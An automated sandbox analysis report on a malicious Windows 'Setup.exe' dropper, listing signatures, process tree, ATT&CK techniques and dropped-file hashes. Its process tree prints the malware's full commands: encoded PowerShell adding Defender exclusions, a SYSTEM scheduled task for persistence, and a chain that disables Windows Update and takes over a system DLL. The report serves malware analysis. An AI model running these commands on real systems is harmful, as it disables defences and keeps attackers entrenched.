Analysis

  • max time kernel
    72s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-05-2022 01:16

General

  • Target

    Setup.exe

  • Size

    4MB

  • MD5

    62ed80f638e9551e1e59b4ea9341bccd

  • SHA1

    44196e8cb0f5774decf60e12215767f092c3c008

  • SHA256

    c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf

  • SHA512

    56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Executes dropped EXE 3 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
    • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Checks whether UAC is enabled
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4596
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:232
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4456
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
          4⤵
          • Creates scheduled task(s)
          PID:4720
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          4⤵
            PID:4064
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
            4⤵
              PID:1632
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              4⤵
              • Modifies registry key
              PID:3552
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
              4⤵
                PID:3684
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                4⤵
                  PID:1292
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                  4⤵
                    PID:2140
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                    4⤵
                      PID:872
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                      4⤵
                        PID:4300
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:3904
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:1548
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:1492
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
                      3⤵
                        PID:728
                        • C:\Windows\system32\choice.exe
                          choice /C Y /N /D Y /T 3
                          4⤵
                            PID:4944
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
                          3⤵
                            PID:3492
                      • C:\Windows\system32\sc.exe
                        sc stop WaaSMedicSvc
                        1⤵
                          PID:4360
                        • C:\Windows\system32\sc.exe
                          sc stop wuauserv
                          1⤵
                            PID:4796
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                            1⤵
                            • Modifies registry key
                            PID:2300
                          • C:\Windows\system32\sc.exe
                            sc stop dosvc
                            1⤵
                              PID:4328
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                              1⤵
                              • Modifies registry key
                              PID:1500
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                              1⤵
                              • Modifies registry key
                              PID:2308
                            • C:\Windows\system32\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                              1⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1380
                            • C:\Windows\system32\takeown.exe
                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                              1⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3324
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                              1⤵
                              • Modifies security service
                              • Modifies registry key
                              PID:1604
                            • C:\Windows\system32\reg.exe
                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                              1⤵
                              • Modifies registry key
                              PID:5032
                            • C:\Windows\system32\sc.exe
                              sc stop bits
                              1⤵
                                PID:2656
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                1⤵
                                  PID:4880
                                • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
                                  "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Modifies data under HKEY_USERS
                                  PID:2884
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
                                    2⤵
                                      PID:2324
                                    • C:\Windows\System32\conhost.exe
                                      C:\Windows\System32\conhost.exe
                                      2⤵
                                        PID:320
                                        • C:\Windows\System32\conhost.exe
                                          "C:\Windows\System32\conhost.exe" "vqtwwwbrwdqzx"
                                          3⤵
                                            PID:3012
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                          2⤵
                                            PID:488
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /run /tn "iexplore"
                                          1⤵
                                            PID:2292
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
                                            1⤵
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4692
                                          • C:\Windows\system32\sc.exe
                                            sc stop bits
                                            1⤵
                                              PID:1904
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                              1⤵
                                              • Modifies registry key
                                              PID:5104
                                            • C:\Windows\system32\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                              1⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:2816
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                              1⤵
                                                PID:3572
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                1⤵
                                                  PID:1152
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                  1⤵
                                                    PID:4252
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                    1⤵
                                                      PID:2508
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                      1⤵
                                                        PID:204
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                        1⤵
                                                          PID:4028
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                          1⤵
                                                            PID:2524
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:4580
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:1040
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:212
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:5036
                                                          • C:\Windows\system32\takeown.exe
                                                            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                            1⤵
                                                            • Possible privilege escalation attempt
                                                            • Modifies file permissions
                                                            PID:1076
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:2052
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:3180
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:1348
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                            1⤵
                                                            • Modifies registry key
                                                            PID:3128
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop dosvc
                                                            1⤵
                                                              PID:820
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop wuauserv
                                                              1⤵
                                                                PID:2924
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop WaaSMedicSvc
                                                                1⤵
                                                                  PID:2792
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop UsoSvc
                                                                  1⤵
                                                                    PID:4200

                                                                  Network

                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                  Execution

                                                                  Scheduled Task

                                                                  1
                                                                  T1053

                                                                  Persistence

                                                                  Modify Existing Service

                                                                  2
                                                                  T1031

                                                                  Scheduled Task

                                                                  1
                                                                  T1053

                                                                  Privilege Escalation

                                                                  Scheduled Task

                                                                  1
                                                                  T1053

                                                                  Defense Evasion

                                                                  Modify Registry

                                                                  2
                                                                  T1112

                                                                  Impair Defenses

                                                                  1
                                                                  T1562

                                                                  File Permissions Modification

                                                                  1
                                                                  T1222

                                                                  Discovery

                                                                  Query Registry

                                                                  1
                                                                  T1012

                                                                  System Information Discovery

                                                                  3
                                                                  T1082

                                                                  Impact

                                                                  Service Stop

                                                                  1
                                                                  T1489

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
                                                                    Filesize

                                                                    109MB

                                                                    MD5

                                                                    1950297d47a665359dde4d26aca66cea

                                                                    SHA1

                                                                    4a90a0c35c0e9a438c030efd42fa3f5c5ece13d0

                                                                    SHA256

                                                                    87e439ba3df8f0e37f2ce2eb48266260e24df4a6882949e7194dce365f9a209a

                                                                    SHA512

                                                                    4be513976f34404ff36bfa176c0c5d1600e4323d0240d43fb994438e0f51f11a9c35a88223acbb3ebed0097343dfe98b065aa692566c5f5a9feff17c65f05354

                                                                  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
                                                                    Filesize

                                                                    111MB

                                                                    MD5

                                                                    cbfba19fa7c371cb8564da353be24b66

                                                                    SHA1

                                                                    5a4455a49f891068e8d6d3319e9432d9bbb28599

                                                                    SHA256

                                                                    70fdd145714a1a614c7190c083e8d4b9afccc4475ccb007cbdb143125baa0564

                                                                    SHA512

                                                                    88eff50a524f7df4f468594b1e0fe27f20c7613904f21cd2fb49ac65663955a62c181d9825e569b272c169c720cdb264fff1ae230d597148f19d62b192c97baa

                                                                  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
                                                                    Filesize

                                                                    421MB

                                                                    MD5

                                                                    e55117c94fc3ccea985ae03f7bf95a6f

                                                                    SHA1

                                                                    d28a699514029af1b911d52da9818f8a20f8aafd

                                                                    SHA256

                                                                    e160b397a204b243998017edf0caa1bb40a33041d70d18f55e86c3925bda190f

                                                                    SHA512

                                                                    e6d27476a5f7d64161b147d73478b81abb6f5ab7e120756444d63736b6d903bddc497985c3cc62bc4cf726ea1ce9516ac916c3c67f29993b989da88febdd3deb

                                                                  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
                                                                    Filesize

                                                                    427MB

                                                                    MD5

                                                                    7420369dd4d15a37a2cfa5560132d0ba

                                                                    SHA1

                                                                    1106e854ec5973404d271a8fe8b27cbddc8580a9

                                                                    SHA256

                                                                    d1726b83bbf8b06a2c6029f52b8bae68beaf2c125574ad527296cd0a8057c45a

                                                                    SHA512

                                                                    0aac7cb42609c0d29e31c08da9d3ca97b891a381f5e74aa248b1815b3ea5a430b6dff9278706ba9ff51cc9d237a3fa810d276444949647f76ae287d8302d7b7f

                                                                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
                                                                    Filesize

                                                                    202MB

                                                                    MD5

                                                                    f7d88c51fa11a526d317881e01927693

                                                                    SHA1

                                                                    9e9ca5d868c0c7b2307c0eef95877e59d582e5da

                                                                    SHA256

                                                                    b6a46cec55a85c7348fba6c2f798e3406fd7a23903a62d51984877639b6ff947

                                                                    SHA512

                                                                    d32eb2b488139f5c2dc48fc8eecfb31f1dd6b8d2862a7f042962052b98582fde43271e44db856e81be79f3e947533ea678f655e41e41c25a83ce11b1d4a947f4

                                                                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
                                                                    Filesize

                                                                    196MB

                                                                    MD5

                                                                    d0dba409b80a61191c37bc6e2d359556

                                                                    SHA1

                                                                    a3b1d755a82a42f429e5400c06f92e909056544f

                                                                    SHA256

                                                                    8496dbee0ca256465aca87c537b0d1e642666886f6d4324f913c7c1220aba089

                                                                    SHA512

                                                                    a48737f8d5312ccec95939e5f8cbe82c4af0b09c7cc4de7160ce20d990ef865f5e2d3c58d7933e05f0b770cf03714eb65be533a31c390c150582a5e55c6a7f3c

                                                                  • memory/204-219-0x0000000000000000-mapping.dmp
                                                                  • memory/212-214-0x0000000000000000-mapping.dmp
                                                                  • memory/232-148-0x0000000000000000-mapping.dmp
                                                                  • memory/232-149-0x000001A6C3250000-0x000001A6C3272000-memory.dmp
                                                                    Filesize

                                                                    136KB

                                                                  • memory/232-150-0x00007FFD511B0000-0x00007FFD51C71000-memory.dmp
                                                                    Filesize

                                                                    10MB

                                                                  • memory/320-208-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                    Filesize

                                                                    108KB

                                                                  • memory/320-209-0x0000000000401BEA-mapping.dmp
                                                                  • memory/320-211-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                    Filesize

                                                                    108KB

                                                                  • memory/488-195-0x0000000000000000-mapping.dmp
                                                                  • memory/728-178-0x0000000000000000-mapping.dmp
                                                                  • memory/820-200-0x0000000000000000-mapping.dmp
                                                                  • memory/872-175-0x0000000000000000-mapping.dmp
                                                                  • memory/1040-215-0x0000000000000000-mapping.dmp
                                                                  • memory/1076-206-0x0000000000000000-mapping.dmp
                                                                  • memory/1152-223-0x0000000000000000-mapping.dmp
                                                                  • memory/1292-173-0x0000000000000000-mapping.dmp
                                                                  • memory/1348-202-0x0000000000000000-mapping.dmp
                                                                  • memory/1380-164-0x0000000000000000-mapping.dmp
                                                                  • memory/1492-166-0x0000000000000000-mapping.dmp
                                                                  • memory/1500-160-0x0000000000000000-mapping.dmp
                                                                  • memory/1548-167-0x0000000000000000-mapping.dmp
                                                                  • memory/1604-159-0x0000000000000000-mapping.dmp
                                                                  • memory/1632-171-0x0000000000000000-mapping.dmp
                                                                  • memory/1904-199-0x0000000000000000-mapping.dmp
                                                                  • memory/2052-204-0x0000000000000000-mapping.dmp
                                                                  • memory/2140-176-0x0000000000000000-mapping.dmp
                                                                  • memory/2292-179-0x0000000000000000-mapping.dmp
                                                                  • memory/2296-141-0x0000000005460000-0x00000000054F2000-memory.dmp
                                                                    Filesize

                                                                    584KB

                                                                  • memory/2296-133-0x0000000000000000-mapping.dmp
                                                                  • memory/2296-134-0x0000000000140000-0x0000000000162000-memory.dmp
                                                                    Filesize

                                                                    136KB

                                                                  • memory/2296-139-0x00000000048F0000-0x0000000004956000-memory.dmp
                                                                    Filesize

                                                                    408KB

                                                                  • memory/2296-140-0x0000000005910000-0x0000000005EB4000-memory.dmp
                                                                    Filesize

                                                                    5MB

                                                                  • memory/2300-157-0x0000000000000000-mapping.dmp
                                                                  • memory/2308-162-0x0000000000000000-mapping.dmp
                                                                  • memory/2324-184-0x0000000000000000-mapping.dmp
                                                                  • memory/2508-221-0x0000000000000000-mapping.dmp
                                                                  • memory/2524-217-0x0000000000000000-mapping.dmp
                                                                  • memory/2648-130-0x0000000000000000-mapping.dmp
                                                                  • memory/2656-155-0x0000000000000000-mapping.dmp
                                                                  • memory/2792-197-0x0000000000000000-mapping.dmp
                                                                  • memory/2816-207-0x0000000000000000-mapping.dmp
                                                                  • memory/2884-183-0x00007FFD520C0000-0x00007FFD52B81000-memory.dmp
                                                                    Filesize

                                                                    10MB

                                                                  • memory/2884-212-0x00000000027A0000-0x00000000027B2000-memory.dmp
                                                                    Filesize

                                                                    72KB

                                                                  • memory/2924-198-0x0000000000000000-mapping.dmp
                                                                  • memory/3012-224-0x000001D050050000-0x000001D050065000-memory.dmp
                                                                    Filesize

                                                                    84KB

                                                                  • memory/3012-225-0x00007FFD520C0000-0x00007FFD52B81000-memory.dmp
                                                                    Filesize

                                                                    10MB

                                                                  • memory/3128-201-0x0000000000000000-mapping.dmp
                                                                  • memory/3180-203-0x0000000000000000-mapping.dmp
                                                                  • memory/3188-151-0x0000000000000000-mapping.dmp
                                                                  • memory/3324-163-0x0000000000000000-mapping.dmp
                                                                  • memory/3492-177-0x0000000000000000-mapping.dmp
                                                                  • memory/3552-169-0x0000000000000000-mapping.dmp
                                                                  • memory/3572-220-0x0000000000000000-mapping.dmp
                                                                  • memory/3684-174-0x0000000000000000-mapping.dmp
                                                                  • memory/3904-168-0x0000000000000000-mapping.dmp
                                                                  • memory/4028-218-0x0000000000000000-mapping.dmp
                                                                  • memory/4064-170-0x0000000000000000-mapping.dmp
                                                                  • memory/4200-196-0x0000000000000000-mapping.dmp
                                                                  • memory/4252-222-0x0000000000000000-mapping.dmp
                                                                  • memory/4300-172-0x0000000000000000-mapping.dmp
                                                                  • memory/4328-156-0x0000000000000000-mapping.dmp
                                                                  • memory/4360-153-0x0000000000000000-mapping.dmp
                                                                  • memory/4456-161-0x0000000000000000-mapping.dmp
                                                                  • memory/4580-216-0x0000000000000000-mapping.dmp
                                                                  • memory/4596-146-0x00007FFD511B0000-0x00007FFD51C71000-memory.dmp
                                                                    Filesize

                                                                    10MB

                                                                  • memory/4596-145-0x00000000004C0000-0x00000000006DC000-memory.dmp
                                                                    Filesize

                                                                    2MB

                                                                  • memory/4596-142-0x0000000000000000-mapping.dmp
                                                                  • memory/4692-188-0x000001D42F350000-0x000001D42F35A000-memory.dmp
                                                                    Filesize

                                                                    40KB

                                                                  • memory/4692-194-0x000001D42F4F0000-0x000001D42F4FA000-memory.dmp
                                                                    Filesize

                                                                    40KB

                                                                  • memory/4692-185-0x0000000000000000-mapping.dmp
                                                                  • memory/4692-186-0x000001D42F270000-0x000001D42F28C000-memory.dmp
                                                                    Filesize

                                                                    112KB

                                                                  • memory/4692-191-0x000001D42F500000-0x000001D42F51A000-memory.dmp
                                                                    Filesize

                                                                    104KB

                                                                  • memory/4692-192-0x000001D42F4B0000-0x000001D42F4B8000-memory.dmp
                                                                    Filesize

                                                                    32KB

